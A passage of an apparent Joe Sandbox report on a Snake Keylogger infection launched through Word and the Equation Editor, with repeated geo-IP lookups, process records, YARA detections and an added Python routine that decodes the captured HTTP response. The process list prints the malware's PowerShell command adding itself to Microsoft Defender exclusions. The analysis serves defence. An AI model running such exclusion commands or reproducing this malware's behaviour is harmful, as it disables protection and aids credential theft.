                    Source Port: 49166
                    Destination IP: 188.114.96.3
                    Destination Port: 443
                    PID: 3244
                    Process: C:\Users\user\AppData\Roaming\obie8920193.exe

                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-01 18:06:16 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    2024-07-01 18:06:17 UTC | 714 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:17 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13138
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iDYqpHSB1JFGvh1y9I%2Fo74%2FmoeErqjl1lVzlvV6gKn%2FGmtaihFUZ9siQtzS95SfPWsbKMDgwyyayWwVxNH%2BjHXX7yeSiU%2BpCTlzMWgFB%2BTNxcu8zxT5EQ1KIen7psZbs29dw6R%2Bg"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c8543c5d4543c4-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:17 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID: 3
                    Source IP: 192.168.2.22
                    Source Port: 49168
                    Destination IP: 188.114.96.3
                    Destination Port: 443
                    PID: 3244
                    Process: C:\Users\user\AppData\Roaming\obie8920193.exe

                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-01 18:06:18 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    2024-07-01 18:06:18 UTC | 704 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:18 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13139
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iR8iHa6KkWEmCKJxz9n8T24w0TuH9L%2FpLFKym0fGvMGo723SumFD%2BYGngXCwJ8Tcmm2ruYBmo7lPAVio4EsdYobMZqKUYYR1vlnl8Ud9vX1g9lEFsqdHmJRfKNOtBS5HLgUNwVl8"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c854462d790c84-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:18 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID: 4
                    Source IP: 192.168.2.22
                    Source Port: 49170
                    Destination IP: 188.114.96.3
                    Destination Port: 443
                    PID: 3244
                    Process: C:\Users\user\AppData\Roaming\obie8920193.exe

                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-01 18:06:19 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-01 18:06:19 UTC | 708 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:19 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13140
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43T3zv8Q1aaysuuCBIt3moD11kw5yB6HWyz46PEX5Q%2FnRswueXRLu3SodkM9v2JMawe64A7yGDgEXBEvu3paRmEz9GDK3%2Ffm6Yyz8mYW5T0v7kpXKNCB9%2FQrc%2F6L2LuJslzt8miI"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c8544d7c225e7a-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:19 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID: 5
                    Source IP: 192.168.2.22
                    Source Port: 49172
                    Destination IP: 188.114.96.3
                    Destination Port: 443
                    PID: 3244
                    Process: C:\Users\user\AppData\Roaming\obie8920193.exe

                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-01 18:06:21 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-01 18:06:22 UTC | 714 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:22 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13143
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JaPtc6FEf%2BoUsHK%2Fi5Imy%2FlFV6uVxBp70fT%2F3YlurQGm8WkkyZ6EMpbTdUQjxOyinKyJYyMJm5fuLeI1uAYK%2FtMaOj2%2BkKkxNJEMYG4knjwIfmQm58CzYGHh%2FafVCostk8bU7okS"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c8545bbd0cc45c-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:22 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID: 6
                    Source IP: 192.168.2.22
                    Source Port: 49174
                    Destination IP: 188.114.96.3
                    Destination Port: 443
                    PID: 3244
                    Process: C:\Users\user\AppData\Roaming\obie8920193.exe

                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-01 18:06:23 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    2024-07-01 18:06:23 UTC | 712 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:23 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13144
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fa0WjLV7TgBE%2Bnld6DnKNvdMW6t3csmiMl%2FPdYaoZU5we7A8wzAU7QQnXNQvLHSTrd2Lkb7UFL3Mj4jXfxWiuj9uc%2B0hn1xGVU4cS8KGC7z81XtZGvkjK1wy4HOFwdDJ9n1pRP%2F%2B"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c85463d9050f83-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:23 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID: 7
                    Source IP: 192.168.2.22
                    Source Port: 49176
                    Destination IP: 188.114.96.3
                    Destination Port: 443
                    PID: 3244
                    Process: C:\Users\user\AppData\Roaming\obie8920193.exe

                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-01 18:06:24 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-01 18:06:24 UTC | 706 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:24 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13145
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yu4Epu9XjvlWjBXA66tQ7pBVUXtdRyca4Ee%2FSZOx29WkFNuLSnkQrWydE6b6Zi6IrdygPUyKBKO85yn6MRefZbljyYBmrNCYhUnPWBvghnE0%2BynVX%2FVdMdj7FWmyxO26dN6FeEIh"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c8546b78f44238-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:24 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID: 8
                    Source IP: 192.168.2.22
                    Source Port: 49178
                    Destination IP: 188.114.96.3
                    Destination Port: 443
                    PID: 3244
                    Process: C:\Users\user\AppData\Roaming\obie8920193.exe

                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-01 18:06:25 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    2024-07-01 18:06:25 UTC | 710 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:25 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13146
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9Ud279Pe9%2FoUu3%2BPZKcTcpfWTjG4UubZXYj%2BEv3EmlKSUmph6fwo1v1vGxYyTbPpFjV2bM8B3V%2Fs65VvrtsFoKZldOLgkf7bNleD8NK5Q4iMBWwfA0%2BLuJNEbIwxT2oZaJJ7tPZ"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c85472f8d042ea-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:25 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0
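The eight sessions above are one and the same request, GET /xml/8.46.123.33 to reallyfreegeoip.org, issued by obie8920193.exe (PID 3244) roughly once a second on fresh TCP connections; Cloudflare answered every one from its cache (CF-Cache-Status: HIT, Age climbing from 13137 to 13146), so the bodies are identical. Worked example added by the editor (not part of the Joe Sandbox report): it decodes the chunked response body as captured and extracts the geolocation fields the process obtained for the address it looked up. The report prints at most 256 bytes of a packet, so the transcribed first chunk stops inside <Latitude>; the chunk-size line still announces 0x14d = 333 bytes, and the decoder reports the capture as incomplete instead of failing the way a strict XML parser would on the unterminated element. The byte string is transcribed from session 1; nothing else is assumed.

```python
import re

# Session 1 above, transcribed from the report (added example data). The body arrived as
# one 0x14d-byte chunk plus the terminating chunk; the copy below is cut where the report's
# 256-byte packet display ends, so it is a deliberately truncated capture.
FIRST_CHUNK_AS_SHOWN = bytes.fromhex(
    "31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 "
    "3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 "
    "3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 "
    "3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 "
    "3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 "
    "3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 "
    "3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 "
    "3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35"
)
LAST_CHUNK = bytes.fromhex("30 0d 0a 0d 0a")   # "0\r\n\r\n": the terminating chunk

TAG_RE = re.compile(rb"<([A-Za-z]+)>([^<]*)</\1>")


def dechunk(data: bytes):
    """Decode HTTP/1.1 chunked transfer-encoding, tolerating a capture that ends mid-chunk.

    Returns (body, complete, declared): complete is True only if the 0-length chunk was
    seen; declared is the total the chunk-size lines announced, so declared > len(body)
    means bytes are missing from the capture rather than from the response.
    """
    body, declared, pos, complete = bytearray(), 0, 0, False
    while True:
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            break                                   # no chunk-size line: capture ends here
        size_text = data[pos:eol].split(b";")[0].strip()   # drop chunk extensions
        if not size_text:
            break
        size = int(size_text, 16)
        pos = eol + 2
        if size == 0:
            complete = True                         # terminating chunk (trailers ignored)
            break
        declared += size
        piece = data[pos:pos + size]
        body += piece
        if len(piece) < size:
            break                                   # chunk cut short: truncated capture
        pos += size + 2                             # skip the chunk's trailing CRLF
    return bytes(body), complete, declared


def geoip_fields(body: bytes) -> dict:
    """Collect closed <Tag>value</Tag> pairs; an element cut off by the capture is skipped."""
    return {m.group(1).decode(): m.group(2).decode() for m in TAG_RE.finditer(body)}


def summarize_session(raw: bytes, request_path: str) -> dict:
    body, complete, declared = dechunk(raw)
    fields = geoip_fields(body)
    return {
        "queried_ip": request_path.rsplit("/", 1)[-1],   # address the sample asked about
        "declared_bytes": declared,
        "captured_bytes": len(body),
        "complete": complete,
        "fields": fields,
        "country": fields.get("CountryCode"),
    }


def summarize_session1() -> dict:
    return summarize_session(FIRST_CHUNK_AS_SHOWN, "/xml/8.46.123.33")


if __name__ == "__main__":
    for key, value in summarize_session1().items():
        print(f"{key:15} {value}")
```

The field the sample cares about is CountryCode; everything after it in the body is cosmetic. Because the lookup is keyed on the sandbox's public address and the answer is cached for a day (Cache-Control: max-age=86400), every analysis run from the same egress sees the same "US" reply, which is worth remembering when an analyst asks whether a sample would behave differently from another country.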


                    Target ID:0
                    Start time:14:06:03
                    Start date:01/07/2024
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Imagebase:0x13f7e0000
                    File size:1'423'704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:2
                    Start time:14:06:04
                    Start date:01/07/2024
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543'304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:14:06:08
                    Start date:01/07/2024
                    Path:C:\Users\user\AppData\Roaming\obie8920193.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\obie8920193.exe"
                    Imagebase:0x290000
                    File size:554'504 bytes
                    MD5 hash:DBDACF479A9DD40133701E06E6DC401C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:true

                    Target ID:6
                    Start time:14:06:11
                    Start date:01/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"
                    Imagebase:0x90000
                    File size:427'008 bytes
                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:7
                    Start time:14:06:11
                    Start date:01/07/2024
                    Path:C:\Users\user\AppData\Roaming\obie8920193.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\obie8920193.exe"
                    Imagebase:0x290000
                    File size:554'504 bytes
                    MD5 hash:DBDACF479A9DD40133701E06E6DC401C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
